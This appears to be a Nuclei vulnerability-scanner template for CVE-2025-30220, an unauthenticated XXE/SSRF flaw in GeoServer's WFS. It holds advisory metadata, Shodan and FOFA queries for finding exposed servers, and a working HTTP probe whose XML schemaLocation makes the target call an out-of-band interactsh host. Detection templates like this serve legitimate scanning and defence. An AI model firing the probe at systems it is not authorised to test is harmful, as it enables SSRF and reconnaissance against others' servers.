GeoServer WFS - XXE Processing Vulnerability

id: CVE-2025-30220

info:
  name: GeoServer WFS - XXE Processing Vulnerability
  author: iamnoooob,pdresearch,darses
  severity: critical
  description: |
    GeoServer Web Feature Service (WFS) is vulnerable to an XML External Entity (XXE) processing attack due to improper handling of XML input. This vulnerability allows attackers to perform Out-of-Band (OOB) data exfiltration and Server-Side Request Forgery (SSRF) by exploiting the GeoTools library.
  impact: |
    Unauthenticated attackers can exploit XXE vulnerabilities in GeoServer WFS to perform OOB data exfiltration and SSRF attacks, potentially accessing internal services and sensitive data.
  remediation: |
    Upgrade to the latest GeoServer version that properly disables external entity processing in WFS requests.
  reference:
    - https://github.com/geoserver/geoserver/security/advisories/GHSA-jj54-8f66-c5pc
    - https://docs.geoserver.org/latest/en/user/production/config.html#production-config-external-entities
    - https://github.com/geonetwork/core-geonetwork/pull/8757
    - https://github.com/geonetwork/core-geonetwork/pull/8803
    - https://github.com/geonetwork/core-geonetwork/pull/8812
    - https://geoserver.org/vulnerability/2025/06/10/cve-disclosure.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
    cvss-score: 9.9
    cve-id: CVE-2025-30220
    cwe-id: CWE-611
    epss-score: 0.08395
    epss-percentile: 0.92295
  metadata:
    verified: true
    max-request: 8
    vendor: osgeo
    product: geoserver
    shodan-query:
      - title:"geoserver"
      - 'http.html_hash:1093634893 "Content-Disposition: inline"'
      - http.favicon.hash:97540678
      - html:"/geoserver/"
    fofa-query:
      - title="geoserver"
      - app="geoserver"
      - icon_hash="97540678"
      - body="/geoserver/"
  tags: cve,cve2025,geoserver,xxe,oast,oob,ssrf,unauth,vkev,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/geoserver/wfs?service=WFS&request=GetCapabilities"
      - "{{BaseURL}}/geoserver/ows?service=WFS&request=GetCapabilities"
      - "{{BaseURL}}/wfs?service=WFS&request=GetCapabilities"
      - "{{BaseURL}}/ows?service=WFS&request=GetCapabilities"

    stop-at-first-match: true

    matchers:
      - type: dsl
        internal: true
        dsl:
          - 'contains(body, "wfs:WFS_Capabilities")'
          - 'contains(content_type, "application/xml")'
          - "status_code == 200"
        condition: and

    extractors:
      - type: xpath
        name: featuretype
        internal: true
        xpath:
          - /wfs:WFS_Capabilities/FeatureTypeList/FeatureType[1]/Name

  - method: POST
    path:
      - "{{BaseURL}}/geoserver/wfs?service=WFS"
      - "{{BaseURL}}/geoserver/ows?service=WFS"
      - "{{BaseURL}}/wfs?service=WFS"
      - "{{BaseURL}}/ows?service=WFS"

    stop-at-first-match: true

    headers:
      Content-Type: "application/xml;charset=UTF-8"

    body: |
      <wfs:GetFeature service="WFS" version="1.0.0"
      xmlns:wfs="http://www.opengis.net/wfs"
      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xsi:schemaLocation="http://a http://{{interactsh-url}}/xxe.xsd">
      <wfs:Query typeName="{{featuretype}}"/>
      </wfs:GetFeature>

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(body, "java.lang.NullPointerException")'
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022035281c2909948ea74c69f64d1037d1049edd25dae8f84854c9e3a91807e67706022100cff0d2151eeeaf4c361824d78a1ce2ee02ac53e2c5533a7536e7004872a892f9:922c64590222798bb761d5b6d8e72950